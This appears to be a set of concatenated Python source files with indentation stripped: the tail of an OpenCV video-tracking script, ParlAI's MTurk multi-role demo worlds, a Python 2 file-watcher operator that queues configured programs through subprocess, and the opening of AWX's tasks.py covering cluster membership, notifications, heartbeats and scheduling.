duration = 0.8 * duration + 0.2 * (t1 - t0)
# duration = t1-t0
cv2.putText(show, 'FPS: ' + str(1 / duration)[:4].strip('.'), (8, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.6,
(0, 0, 255), 2)
cv2.imshow('tracking', show)
if (timer == network_inteval):
timer = 0
cnt+=1
if cnt<show_delay/network_inteval:
renew=Renew(x[cnt],y[cnt],w[cnt],h[cnt],box)
else:
renew=True
if renew:
pool.close()
pool.join()
if (cnt==show_delay/network_inteval):
initTracking = True
onTracking = False
cnt=0
if(ret):
video.put(frame)
cn = cn + 1
if(timer==1):
capture.put(frame)
cv2.waitKey(inteval)
"""c = cv2.waitKey(inteval) & 0xFF
# break
if c == 27 or c == ord('q'):
break"""
#print(k,cn,ct)
t4=time()
print (t4-t3)
cv2.destroyAllWindows()
def video_tracking():
print ("java")
if (len(sys.argv) == 1):
cap = cv2.VideoCapture(0)
else:
if (sys.argv[1].isdigit()): # True if sys.argv[1] is str of a nonnegative integer
cap = cv2.VideoCapture(int(sys.argv[1]))
else:
name=[]
for i in range (1,len(sys.argv)):
name.append(sys.argv[i])
print (name)
inteval = 30
gpu = 0
ctx = mx.gpu(gpu)
record=[]
for i in range(0, len(sys.argv)-1):
process = multiprocessing.Process(target=video, args=(str(name[i]),ctx))
process.start()
record.append(process)
# print(boundingbox)
for process in record:
process.join()
if __name__ == '__main__':
video_tracking()
# if you use hog feature, there will be a short pause after you draw a first boundingbox, that is due to the use of Numba.
|
worlds.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from parlai.mturk.core.worlds import MTurkOnboardWorld, MTurkTaskWorld
import threading
class AskerOnboardingWorld(MTurkOnboardWorld):
"""Example onboarding world. Sends a message from the world to the
worker and then exits as complete after the worker uses the interface
"""
def parley(self):
ad = {}
ad['id'] = 'System'
ad['text'] = (
"Welcome onboard! You'll be playing the role of the asker. Ask "
"a question that can be answered with just a number. Send any "
"message to continue."
)
self.mturk_agent.observe(ad)
self.mturk_agent.act()
self.episodeDone = True
class AnswererOnboardingWorld(MTurkOnboardWorld):
"""Example onboarding world. Sends a message from the world to the
worker and then exits as complete after the worker uses the interface
"""
def parley(self):
ad = {}
ad['id'] = 'System'
ad['text'] = (
"Welcome onboard! You'll be playing the role of the answerer. "
"You'll be asked a question that should be answered with a number. "
"Answer with something that makes sense. Enter any number to "
"continue."
)
self.mturk_agent.observe(ad)
self.mturk_agent.act()
self.episodeDone = True
class EvaluatorOnboardingWorld(MTurkOnboardWorld):
"""Example onboarding world. Sends a message from the world to the
worker and then exits as complete after the worker uses the interface
"""
def parley(self):
ad = {}
ad['id'] = 'System'
ad['text'] = (
"Welcome onboard! You'll be playing the evaluator. You'll "
"observe a series of three questions, and then you'll evaluate "
"whether or not the exchange was accurate. Send an eval to begin."
)
self.mturk_agent.observe(ad)
self.mturk_agent.act()
self.episodeDone = True
class MultiRoleAgentWorld(MTurkTaskWorld):
"""
World to demonstrate workers with assymetric roles. This task amounts
to three rounds and then an evaluation step. It is purposefully created
as a task to demo multiple views and has no other purpose.
"""
collector_agent_id = 'Moderator'
def __init__(self, opt, mturk_agents):
self.mturk_agents = mturk_agents
for agent in mturk_agents:
if agent.demo_role == 'Asker':
self.asker = agent
elif agent.demo_role == 'Answerer':
self.answerer = agent
else: # 'Evaluator'
self.evaluator = agent
self.episodeDone = False
self.turns = 0
self.questions = []
self.answers = []
self.accepted = None
def parley(self):
if self.turns == 0:
# Instruction for evaluator
ad = {'id': 'System', 'text': "Please observe the chat for accuracy."}
self.evaluator.observe(ad)
if self.turns < 3:
# QA pairing
ad = {
'id': 'System',
'text': "Please ask a question with a numeric answer.",
}
self.asker.observe(ad)
question = self.asker.act()
ad = {'id': 'System', 'text': 'Please answer this question.'}
self.answerer.observe(ad)
self.answerer.observe(question)
self.evaluator.observe(question)
answer = self.answerer.act()
self.evaluator.observe(answer)
self.asker.observe(answer)
self.questions.append(question)
self.answers.append(answer)
self.turns += 1
else:
# evaluate
ad = {'id': 'System', 'text': "Please provide your evaluation."}
self.evaluator.observe(ad)
ad = {'id': 'System', 'text': "Please wait for evaluation."}
self.answerer.observe(ad)
self.asker.observe(ad)
self.accepter = self.evaluator.act()
self.episodeDone = True
def episode_done(self):
return self.episodeDone
def shutdown(self):
# Parallel shutdown of agents
def shutdown_agent(agent):
try:
agent.shutdown(timeout=None)
except Exception:
agent.shutdown() # not MTurkAgent
threads = []
for agent in self.mturk_agents:
t = threading.Thread(target=shutdown_agent, args=(agent,))
t.start()
threads.append(t)
for t in threads:
t.join()
def review_work(self):
# Can review the work here to accept or reject it
pass
def get_custom_task_data(self):
# brings important data together for the task, to later be used for
# creating the dataset. If data requires pickling, put it in a field
# called 'needs-pickle'.
return {
'questions': self.questions,
'answers': self.answers,
'evaluation': self.accepted,
}
|
coderunner.py
|
# -*- coding: utf-8 -*-
import os
import re
import subprocess
import syslog
import threading
import Queue
from filewatcher import componentprop
_runner_queue = {}
_task_queue_assignment = re.compile('^\(([A-Za-z0-9-]+)\)\s*([^\s].+)$')
_command_carry_variable_macro = re.compile('^%([A-Za-z0-9_-]+)%$')
def _subprocess_worker(worker_qlabel, worker_id, q):
running = True
while running:
try:
cmd = q.get(True, None)
if cmd is not None:
try:
retcode = subprocess.call(cmd)
except Exception as e:
print "Have exception on subprocess.call: cmd=%r; exception=%s" % (cmd, e,)
retcode = -65536
syslog.syslog(syslog.LOG_INFO, "QueuedInvoke: run program [%s] with retcode=%d, worker=%d/%r." % (cmd, retcode, worker_id, worker_qlabel,))
else:
print "subprocess-worker exiting (ID=%d/Q=%r)" % (worker_id, worker_qlabel,)
running = False
q.task_done()
except Queue.Empty:
pass
# ### def _subprocess_worker
class _RunConfiguration:
def __init__(self, queue, command):
self.queue = queue
self.command = command
# ### __init__
# ### class __RunConfiguration
class _RunnerQueue:
""" 放置執行程式的 Runner/Worker 的佇列 """
def __init__(self, queue_label, max_running_process, max_running_second=None):
""" 建構子
參數:
queue_label - 佇列名稱
max_running_process - 最大同時執行行程數,使用 None 表示不指定
max_running_second - 最長程式執行時間 (秒) 上限,使用 None 表示不指定 (** 未實作)
"""
self.queue_label = queue_label
self.max_running_process = max_running_process
self.max_running_second = max_running_second
self.cmd_queue = None
self.workers = None
# ### def __init__
def start_workers(self):
""" 啟動 worker thread
參數: (無)
回傳值: (無)
"""
if (self.max_running_process is None) or (self.max_running_process < 1):
syslog.syslog(syslog.LOG_INFO, "allocated static runner (Q=%r)" % (self.queue_label,))
return # 最大執行行程為空值的話則不啟動任何 worker
workers_q = []
self.cmd_queue = Queue.Queue()
for idx in range(self.max_running_process):
wk = threading.Thread(target=_subprocess_worker, args=(self.queue_label, idx, self.cmd_queue,))
wk.start()
workers_q.append(wk)
print "created worker named %r (ID=%d/Q=%r)" % (wk.name, idx, self.queue_label,)
self.workers = workers_q
syslog.syslog(syslog.LOG_INFO, "allocated threaded runner (Q=%r, size=%d)" % (self.queue_label, self.max_running_process,))
# ### def start_workers
def run_program(self, cmdlist, filepath, carry_variable, logqueue):
""" 執行指定的程式執行作業
參數:
cmdlist - 要執行程式的路徑與參數
filepath - 作為參數的檔案檔名
carry_variable - 要引入的變數 dict
logqueue - 用作儲存紀錄的 list 物件
回傳值:
(無)
"""
progpath = cmdlist[0]
if (progpath is None) or (not os.path.isfile(progpath)) or (not os.access(progpath, os.X_OK)) or (filepath is None):
logqueue.append("not run any program (cmd=%r, file-path=%r)" % (cmdlist, filepath,))
return
# {{{ build command
cmd = []
for v in cmdlist:
m = _command_carry_variable_macro.match(v)
if m is None:
cmd.append(v)
else:
varname = m.group(1)
if """FILENAME""" == varname: # resolve built-in macro: FILENAME
cmd.append(filepath)
elif varname in carry_variable: # resolve macro from carry_variable
cmd.append(carry_variable[varname])
else: # all the others, just output as one of arguments
cmd.append(v)
# }}} build command
if self.cmd_queue is None:
runprog_retcode = subprocess.call(cmd)
logqueue.append("run program [%s: %r] with retcode=%d" % (progpath, cmd, runprog_retcode))
else:
self.cmd_queue.put(cmd)
logqueue.append("queued program [%s: %r] into queue=%s" % (progpath, cmd, self.queue_label))
# ### def run_program
def stop_workers(self):
""" 停下執行程式的執行緒 workers
參數: (無)
回傳值: (無)
"""
if self.cmd_queue is None:
return # no worker running, naturally
for wk in self.workers:
if wk.is_alive():
self.cmd_queue.put(None)
else:
print "worker %r not alive anymore" % (wk.name,)
syslog.syslog(syslog.LOG_NOTICE, "RunnerQueue joining task queue (Q=%r)" % (self.queue_label,))
self.cmd_queue.join()
# ### def stop_workers
# ### class Runner
_cached_module_prop_instance = componentprop.OperatorProp('program_runner', 'run_program', schedule_priority=None, run_priority=3)
def get_module_prop():
""" 取得操作器各項特性/屬性
參數: (無)
回傳值:
傳回 componentprop.OperatorProp 物件
"""
return _cached_module_prop_instance
# ### def get_module_prop
def operator_configure(config, metastorage):
""" 設定操作器組態
參數:
config - 帶有參數的字典
metastorage - 中介資訊資料庫物件
回傳值:
(無)
"""
default_max_running_process = None
# {{{ get queue size for default queue
if 'max_running_program' in config:
try:
default_max_running_process = int(config['max_running_program'])
except:
default_max_running_process = None
# }}} get queue size for default queue
# {{{ use multiple queues
if 'queue' in config:
# {{{ scan over each queue configuration
for qconfig in config['queue']:
max_running_process = None
if 'max_running_program' in qconfig:
try:
max_running_process = int(qconfig['max_running_program'])
except:
max_running_process = None
if 'name' in qconfig:
qname = str(qconfig['name'])
_runner_queue[qname] = _RunnerQueue(qname, max_running_process)
# }}} scan over each queue configuration
# }}} use multiple queues
# setup default queue
_runner_queue['_DEFAULT'] = _RunnerQueue('_DEFAULT', default_max_running_process)
# {{{ start workers
for runner in _runner_queue.itervalues():
runner.start_workers()
# }}} start workers
# ### def operator_configure
def read_operation_argv(argv):
""" 取得操作設定
參數:
argv - 設定檔中的設定
回傳值:
吻合工作模組需求的設定物件
"""
cmd_argv = None
que_argv = '_DEFAULT'
if isinstance(argv, dict):
if 'queue' in argv:
que_argv = argv['queue']
cmd_argv = argv['command']
else:
cmd_argv = argv
result_cmd = None
# {{{ attempt to build command list as list
if isinstance(cmd_argv, (basestring, str, unicode,)):
result_cmd = [cmd_argv, """%FILENAME%"""]
elif isinstance(cmd_argv, (tuple, list,)):
have_filename_macro = False
result_cmd = []
for v in cmd_argv:
if """%FILENAME%""" == v:
have_filename_macro = True
result_cmd.append(v)
if not have_filename_macro:
result_cmd.append("""%FILENAME%""")
else:
result_cmd = cmd_argv
# }}} attempt to build command list as list
# {{{ check if use queue short-cut -syntax (eg: (QUEUE) /path/to/cmd )
if isinstance(result_cmd, list):
m = _task_queue_assignment.match(result_cmd[0])
if m is not None:
q = m.group(1)
result_cmd[0] = m.group(2)
if q in _runner_queue:
que_argv = q
# }}} check if use queue short-cut -syntax
return _RunConfiguration(que_argv, result_cmd)
# ### read_operation_argv
def perform_operation(current_filepath, orig_filename, argv, oprexec_ref, logqueue=None):
""" 執行操作
參數:
current_filepath - 目標檔案絕對路徑 (如果是第一個操作,可能檔案名稱會是更改過的)
orig_filename - 原始檔案名稱 (不含路徑)
argv - 設定檔給定的操作參數
oprexec_ref - 作業參考物件 (含: 檔案名稱與路徑名稱比對結果、檔案內容數位簽章... etc)
logqueue - 紀錄訊息串列物件
回傳值:
經過操作後的檔案絕對路徑
"""
r_queue = argv.queue
if r_queue not in _runner_queue:
logqueue.append("queue not found: %r"%(r_queue,))
r_queue = '_DEFAULT'
if r_queue not in _runner_queue:
print "ERR: coderunner - missing queue: queue=%r, _runner_queue=%r" % (r_queue, _runner_queue,)
_runner_queue[r_queue].run_program(argv.command, current_filepath, oprexec_ref.carry_variable, logqueue)
return current_filepath
# ### def perform_operation
def operator_stop():
""" 停止作業,準備結束
參數:
(無)
回傳值:
(無)
"""
syslog.syslog(syslog.LOG_NOTICE, "coderunner: stopping all Runner")
for runner in _runner_queue.itervalues():
runner.stop_workers()
syslog.syslog(syslog.LOG_NOTICE, "coderunner: all Runner stopped")
# ### def operator_stop
# vim: ts=4 sw=4 ai nowrap
|
tasks.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
from collections import OrderedDict, namedtuple
import errno
import functools
import importlib
import json
import logging
import os
import shutil
import stat
import tempfile
import time
import traceback
from distutils.dir_util import copy_tree
from distutils.version import LooseVersion as Version
import yaml
import fcntl
from pathlib import Path
from uuid import uuid4
import urllib.parse as urlparse
import socket
import threading
import concurrent.futures
from base64 import b64encode
import subprocess
import sys
# Django
from django.conf import settings
from django.db import transaction, DatabaseError, IntegrityError
from django.db.models.fields.related import ForeignKey
from django.utils.timezone import now
from django.utils.encoding import smart_str
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _, gettext_noop
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from django_guid.middleware import GuidMiddleware
# Django-CRUM
from crum import impersonate
# GitPython
import git
from gitdb.exc import BadName as BadGitName
# Runner
import ansible_runner
# Receptor
from receptorctl.socket_interface import ReceptorControl
# AWX
from awx import __version__ as awx_application_version
from awx.main.constants import PRIVILEGE_ESCALATION_METHODS, STANDARD_INVENTORY_UPDATE_ENV
from awx.main.access import access_registry
from awx.main.redact import UriCleaner
from awx.main.models import (
Schedule,
TowerScheduleState,
Instance,
InstanceGroup,
UnifiedJob,
Notification,
Inventory,
InventorySource,
SmartInventoryMembership,
Job,
AdHocCommand,
ProjectUpdate,
InventoryUpdate,
SystemJob,
JobEvent,
ProjectUpdateEvent,
InventoryUpdateEvent,
AdHocCommandEvent,
SystemJobEvent,
build_safe_env,
)
from awx.main.constants import ACTIVE_STATES
from awx.main.exceptions import AwxTaskError, PostRunError
from awx.main.queue import CallbackQueueDispatcher
from awx.main.dispatch.publish import task
from awx.main.dispatch import get_local_queuename, reaper
from awx.main.utils import (
update_scm_url,
ignore_inventory_computed_fields,
ignore_inventory_group_removal,
extract_ansible_vars,
schedule_task_manager,
get_awx_version,
deepmerge,
parse_yaml_or_json,
cleanup_new_process,
)
from awx.main.utils.execution_environments import get_default_execution_environment, get_default_pod_spec, CONTAINER_ROOT, to_container_path
from awx.main.utils.ansible import read_ansible_config
from awx.main.utils.external_logging import reconfigure_rsyslog
from awx.main.utils.safe_yaml import safe_dump, sanitize_jinja
from awx.main.utils.reload import stop_local_services
from awx.main.utils.pglock import advisory_lock
from awx.main.utils.handlers import SpecialInventoryHandler
from awx.main.consumers import emit_channel_notification
from awx.main import analytics
from awx.conf import settings_registry
from awx.conf.license import get_license
from awx.main.analytics.subsystem_metrics import Metrics
from rest_framework.exceptions import PermissionDenied
__all__ = [
'RunJob',
'RunSystemJob',
'RunProjectUpdate',
'RunInventoryUpdate',
'RunAdHocCommand',
'handle_work_error',
'handle_work_success',
'apply_cluster_membership_policies',
'update_inventory_computed_fields',
'update_host_smart_inventory_memberships',
'send_notifications',
'purge_old_stdout_files',
]
HIDDEN_PASSWORD = '**********'
OPENSSH_KEY_ERROR = u'''\
It looks like you're trying to use a private key in OpenSSH format, which \
isn't supported by the installed version of OpenSSH on this instance. \
Try upgrading OpenSSH or providing your private key in an different format. \
'''
logger = logging.getLogger('awx.main.tasks')
class InvalidVirtualenvError(Exception):
def __init__(self, message):
self.message = message
def dispatch_startup():
startup_logger = logging.getLogger('awx.main.tasks')
startup_logger.debug("Syncing Schedules")
for sch in Schedule.objects.all():
try:
sch.update_computed_fields()
except Exception:
logger.exception("Failed to rebuild schedule {}.".format(sch))
#
# When the dispatcher starts, if the instance cannot be found in the database,
# automatically register it. This is mostly useful for openshift-based
# deployments where:
#
# 2 Instances come online
# Instance B encounters a network blip, Instance A notices, and
# deprovisions it
# Instance B's connectivity is restored, the dispatcher starts, and it
# re-registers itself
#
# In traditional container-less deployments, instances don't get
# deprovisioned when they miss their heartbeat, so this code is mostly a
# no-op.
#
apply_cluster_membership_policies()
cluster_node_heartbeat()
Metrics().clear_values()
# Update Tower's rsyslog.conf file based on loggins settings in the db
reconfigure_rsyslog()
def inform_cluster_of_shutdown():
try:
this_inst = Instance.objects.get(hostname=settings.CLUSTER_HOST_ID)
this_inst.capacity = 0 # No thank you to new jobs while shut down
this_inst.save(update_fields=['capacity', 'modified'])
try:
reaper.reap(this_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(this_inst.hostname))
logger.warning('Normal shutdown signal for instance {}, ' 'removed self from capacity pool.'.format(this_inst.hostname))
except Exception:
logger.exception('Encountered problem with normal shutdown signal.')
@task(queue=get_local_queuename)
def apply_cluster_membership_policies():
started_waiting = time.time()
with advisory_lock('cluster_policy_lock', wait=True):
lock_time = time.time() - started_waiting
if lock_time > 1.0:
to_log = logger.info
else:
to_log = logger.debug
to_log('Waited {} seconds to obtain lock name: cluster_policy_lock'.format(lock_time))
started_compute = time.time()
all_instances = list(Instance.objects.order_by('id'))
all_groups = list(InstanceGroup.objects.prefetch_related('instances'))
total_instances = len(all_instances)
actual_groups = []
actual_instances = []
Group = namedtuple('Group', ['obj', 'instances', 'prior_instances'])
Node = namedtuple('Instance', ['obj', 'groups'])
# Process policy instance list first, these will represent manually managed memberships
instance_hostnames_map = {inst.hostname: inst for inst in all_instances}
for ig in all_groups:
group_actual = Group(obj=ig, instances=[], prior_instances=[instance.pk for instance in ig.instances.all()]) # obtained in prefetch
for hostname in ig.policy_instance_list:
if hostname not in instance_hostnames_map:
logger.info("Unknown instance {} in {} policy list".format(hostname, ig.name))
continue
inst = instance_hostnames_map[hostname]
group_actual.instances.append(inst.id)
# NOTE: arguable behavior: policy-list-group is not added to
# instance's group count for consideration in minimum-policy rules
if group_actual.instances:
logger.debug("Policy List, adding Instances {} to Group {}".format(group_actual.instances, ig.name))
actual_groups.append(group_actual)
# Process Instance minimum policies next, since it represents a concrete lower bound to the
# number of instances to make available to instance groups
actual_instances = [Node(obj=i, groups=[]) for i in all_instances if i.managed_by_policy]
logger.debug("Total instances: {}, available for policy: {}".format(total_instances, len(actual_instances)))
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_min_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if len(g.instances) >= g.obj.policy_instance_minimum:
break
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via the policy list
continue
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_min_added.append(i.obj.id)
if policy_min_added:
logger.debug("Policy minimum, adding Instances {} to Group {}".format(policy_min_added, g.obj.name))
# Finally, process instance policy percentages
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_per_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via a minimum policy or policy list
continue
if 100 * float(len(g.instances)) / len(actual_instances) >= g.obj.policy_instance_percentage:
break
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_per_added.append(i.obj.id)
if policy_per_added:
logger.debug("Policy percentage, adding Instances {} to Group {}".format(policy_per_added, g.obj.name))
# Determine if any changes need to be made
needs_change = False
for g in actual_groups:
if set(g.instances) != set(g.prior_instances):
needs_change = True
break
if not needs_change:
logger.debug('Cluster policy no-op finished in {} seconds'.format(time.time() - started_compute))
return
# On a differential basis, apply instances to groups
with transaction.atomic():
for g in actual_groups:
if g.obj.is_container_group:
logger.debug('Skipping containerized group {} for policy calculation'.format(g.obj.name))
continue
instances_to_add = set(g.instances) - set(g.prior_instances)
instances_to_remove = set(g.prior_instances) - set(g.instances)
if instances_to_add:
logger.debug('Adding instances {} to group {}'.format(list(instances_to_add), g.obj.name))
g.obj.instances.add(*instances_to_add)
if instances_to_remove:
logger.debug('Removing instances {} from group {}'.format(list(instances_to_remove), g.obj.name))
g.obj.instances.remove(*instances_to_remove)
logger.debug('Cluster policy computation finished in {} seconds'.format(time.time() - started_compute))
@task(queue='tower_broadcast_all')
def handle_setting_changes(setting_keys):
orig_len = len(setting_keys)
for i in range(orig_len):
for dependent_key in settings_registry.get_dependent_settings(setting_keys[i]):
setting_keys.append(dependent_key)
cache_keys = set(setting_keys)
logger.debug('cache delete_many(%r)', cache_keys)
cache.delete_many(cache_keys)
if any([setting.startswith('LOG_AGGREGATOR') for setting in setting_keys]):
reconfigure_rsyslog()
@task(queue='tower_broadcast_all')
def delete_project_files(project_path):
# TODO: possibly implement some retry logic
lock_file = project_path + '.lock'
if os.path.exists(project_path):
try:
shutil.rmtree(project_path)
logger.debug('Success removing project files {}'.format(project_path))
except Exception:
logger.exception('Could not remove project directory {}'.format(project_path))
if os.path.exists(lock_file):
try:
os.remove(lock_file)
logger.debug('Success removing {}'.format(lock_file))
except Exception:
logger.exception('Could not remove lock file {}'.format(lock_file))
@task(queue='tower_broadcast_all')
def profile_sql(threshold=1, minutes=1):
if threshold <= 0:
cache.delete('awx-profile-sql-threshold')
logger.error('SQL PROFILING DISABLED')
else:
cache.set('awx-profile-sql-threshold', threshold, timeout=minutes * 60)
logger.error('SQL QUERIES >={}s ENABLED FOR {} MINUTE(S)'.format(threshold, minutes))
@task(queue=get_local_queuename)
def send_notifications(notification_list, job_id=None):
if not isinstance(notification_list, list):
raise TypeError("notification_list should be of type list")
if job_id is not None:
job_actual = UnifiedJob.objects.get(id=job_id)
notifications = Notification.objects.filter(id__in=notification_list)
if job_id is not None:
job_actual.notifications.add(*notifications)
for notification in notifications:
update_fields = ['status', 'notifications_sent']
try:
sent = notification.notification_template.send(notification.subject, notification.body)
notification.status = "successful"
notification.notifications_sent = sent
if job_id is not None:
job_actual.log_lifecycle("notifications_sent")
except Exception as e:
logger.exception("Send Notification Failed {}".format(e))
notification.status = "failed"
notification.error = smart_str(e)
update_fields.append('error')
finally:
try:
notification.save(update_fields=update_fields)
except Exception:
logger.exception('Error saving notification {} result.'.format(notification.id))
@task(queue=get_local_queuename)
def gather_analytics():
from awx.conf.models import Setting
from rest_framework.fields import DateTimeField
last_gather = Setting.objects.filter(key='AUTOMATION_ANALYTICS_LAST_GATHER').first()
last_time = DateTimeField().to_internal_value(last_gather.value) if last_gather and last_gather.value else None
gather_time = now()
if not last_time or ((gather_time - last_time).total_seconds() > settings.AUTOMATION_ANALYTICS_GATHER_INTERVAL):
analytics.gather()
@task(queue=get_local_queuename)
def purge_old_stdout_files():
nowtime = time.time()
for f in os.listdir(settings.JOBOUTPUT_ROOT):
if os.path.getctime(os.path.join(settings.JOBOUTPUT_ROOT, f)) < nowtime - settings.LOCAL_STDOUT_EXPIRE_TIME:
os.unlink(os.path.join(settings.JOBOUTPUT_ROOT, f))
logger.debug("Removing {}".format(os.path.join(settings.JOBOUTPUT_ROOT, f)))
@task(queue=get_local_queuename)
def cleanup_execution_environment_images():
if settings.IS_K8S:
return
process = subprocess.run('podman images --filter="dangling=true" --format json'.split(" "), capture_output=True)
if process.returncode != 0:
logger.debug("Cleanup execution environment images: could not get list of images")
return
if len(process.stdout) > 0:
images_system = json.loads(process.stdout)
for e in images_system:
image_name = e["Id"]
logger.debug(f"Cleanup execution environment images: deleting {image_name}")
process = subprocess.run(['podman', 'rmi', image_name, '-f'], stdout=subprocess.DEVNULL)
if process.returncode != 0:
logger.debug(f"Failed to delete image {image_name}")
@task(queue=get_local_queuename)
def cluster_node_heartbeat():
logger.debug("Cluster node heartbeat task.")
nowtime = now()
instance_list = list(Instance.objects.all())
this_inst = None
lost_instances = []
(changed, instance) = Instance.objects.get_or_register()
if changed:
logger.info("Registered tower node '{}'".format(instance.hostname))
for inst in list(instance_list):
if inst.hostname == settings.CLUSTER_HOST_ID:
this_inst = inst
instance_list.remove(inst)
elif inst.is_lost(ref_time=nowtime):
lost_instances.append(inst)
instance_list.remove(inst)
if this_inst:
startup_event = this_inst.is_lost(ref_time=nowtime)
this_inst.refresh_capacity()
if startup_event:
logger.warning('Rejoining the cluster as instance {}.'.format(this_inst.hostname))
return
else:
raise RuntimeError("Cluster Host Not Found: {}".format(settings.CLUSTER_HOST_ID))
# IFF any node has a greater version than we do, then we'll shutdown services
for other_inst in instance_list:
if other_inst.version == "":
continue
if Version(other_inst.version.split('-', 1)[0]) > Version(awx_application_version.split('-', 1)[0]) and not settings.DEBUG:
logger.error(
"Host {} reports version {}, but this node {} is at {}, shutting down".format(
other_inst.hostname, other_inst.version, this_inst.hostname, this_inst.version
)
)
# Shutdown signal will set the capacity to zero to ensure no Jobs get added to this instance.
# The heartbeat task will reset the capacity to the system capacity after upgrade.
stop_local_services(communicate=False)
raise RuntimeError("Shutting down.")
for other_inst in lost_instances:
try:
reaper.reap(other_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(other_inst.hostname))
try:
# Capacity could already be 0 because:
# * It's a new node and it never had a heartbeat
# * It was set to 0 by another tower node running this method
# * It was set to 0 by this node, but auto deprovisioning is off
#
# If auto deprovisining is on, don't bother setting the capacity to 0
# since we will delete the node anyway.
if other_inst.capacity != 0 and not settings.AWX_AUTO_DEPROVISION_INSTANCES:
other_inst.capacity = 0
other_inst.save(update_fields=['capacity'])
logger.error("Host {} last checked in at {}, marked as lost.".format(other_inst.hostname, other_inst.modified))
elif settings.AWX_AUTO_DEPROVISION_INSTANCES:
deprovision_hostname = other_inst.hostname
other_inst.delete()
logger.info("Host {} Automatically Deprovisioned.".format(deprovision_hostname))
except DatabaseError as e:
if 'did not affect any rows' in str(e):
logger.debug('Another instance has marked {} as lost'.format(other_inst.hostname))
else:
logger.exception('Error marking {} as lost'.format(other_inst.hostname))
@task(queue=get_local_queuename)
def awx_k8s_reaper():
if not settings.RECEPTOR_RELEASE_WORK:
return
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
for group in InstanceGroup.objects.filter(is_container_group=True).iterator():
logger.debug("Checking for orphaned k8s pods for {}.".format(group))
pods = PodManager.list_active_jobs(group)
for job in UnifiedJob.objects.filter(pk__in=pods.keys()).exclude(status__in=ACTIVE_STATES):
logger.debug('{} is no longer active, reaping orphaned k8s pod'.format(job.log_format))
try:
pm = PodManager(job)
pm.kube_api.delete_namespaced_pod(name=pods[job.id], namespace=pm.namespace, _request_timeout=settings.AWX_CONTAINER_GROUP_K8S_API_TIMEOUT)
except Exception:
logger.exception("Failed to delete orphaned pod {} from {}".format(job.log_format, group))
@task(queue=get_local_queuename)
def awx_periodic_scheduler():
with advisory_lock('awx_periodic_scheduler_lock', wait=False) as acquired:
if acquired is False:
logger.debug("Not running periodic scheduler, another task holds lock")
return
logger.debug("Starting periodic scheduler")
run_now = now()
state = TowerScheduleState.get_solo()
last_run = state.schedule_last_run
logger.debug("Last scheduler run was: %s", last_run)
state.schedule_last_run = run_now
state.save()
old_schedules = Schedule.objects.enabled().before(last_run)
for schedule in old_schedules:
schedule.update_computed_fields()
schedules = Schedule.objects.enabled().between(last_run, run_now)
invalid_license = False
try:
access_registry[Job](None).check_license(quiet=True)
except PermissionDenied as e:
invalid_license = e
for schedule in schedules:
template = schedule.unified_job_template
schedule.update_computed_fields() # To update next_run timestamp.
if template.cache_timeout_blocked:
logger.warn("Cache timeout is in the future, bypassing schedule for template %s" % str(template.id))
continue
try:
job_kwargs = schedule.get_job_kwargs()
new_unified_job = schedule.unified_job_template.create_unified_job(**job_kwargs)
logger.debug('Spawned {} from schedule {}-{}.'.format(new_unified_job.log_format, schedule.name, schedule.pk))
if invalid_license:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = str(invalid_license)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
raise invalid_license
can_start = new_unified_job.signal_start()
except Exception:
logger.exception('Error spawning scheduled job.')
continue
if not can_start:
new_unified_job.status = 'failed'
new_unified_job.job_explanation = gettext_noop(
"Scheduled job could not start because it \
was not in the right state or required manual credentials"
)
new_unified_job.save(update_fields=['status', 'job_explanation'])
new_unified_job.websocket_emit_status("failed")
emit_channel_notification('schedules-changed', dict(id=schedule.id, group_name="schedules"))
state.save()
@task(queue=get_local_queuename)
def handle_work_success(task_actual):
try:
instance = UnifiedJob.get_instance_by_type(task_actual['type'], task_actual['id'])
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in success callback.'.format(task_actual['type'], task_actual['id']))
return
if not instance:
return
schedule_task_manager()
@task(queue=get_local_queuename)
def handle_work_error(task_id, *args, **kwargs):
subtasks = kwargs.get('subtasks', None)
logger.debug('Executing error task id %s, subtasks: %s' % (task_id, str(subtasks)))
first_instance = None
first_instance_type = ''
if subtasks is not None:
for each_task in subtasks:
try:
instance = UnifiedJob.get_instance_by_type(each_task['type'], each_task['id'])
if not instance:
# Unknown task type
logger.warn("Unknown task type: {}".format(each_task['type']))
continue
except ObjectDoesNotExist:
logger.warning('Missing {} `{}` in error callback.'.format(each_task['type'], each_task['id']))
continue
if first_instance is None:
first_instance = instance
first_instance_type = each_task['type']
if instance.celery_task_id != task_id and not instance.cancel_flag and not instance.status == 'successful':
instance.status = 'failed'
instance.failed = True
if not instance.job_explanation:
instance.job_explanation = 'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}' % (
first_instance_type,
first_instance.name,
first_instance.id,
)
instance.save()
instance.websocket_emit_status("failed")
# We only send 1 job complete message since all the job completion message
# handling does is trigger the scheduler. If we extend the functionality of
# what the job complete message handler does then we may want to send a
# completion event for each job here.
if first_instance:
schedule_task_manager()
pass
@task(queue=get_local_queuename)
def handle_success_and_failure_notifications(job_id):
uj = UnifiedJob.objects.get(pk=job_id)
retries = 0
while retries < 5:
if uj.finished:
uj.send_notification_templates('succeeded' if uj.status == 'successful' else 'failed')
return
else:
# wait a few seconds to avoid a race where the
# events are persisted _before_ the UJ.status
# changes from running -> successful
retries += 1
time.sleep(1)
uj = UnifiedJob.objects.get(pk=job_id)
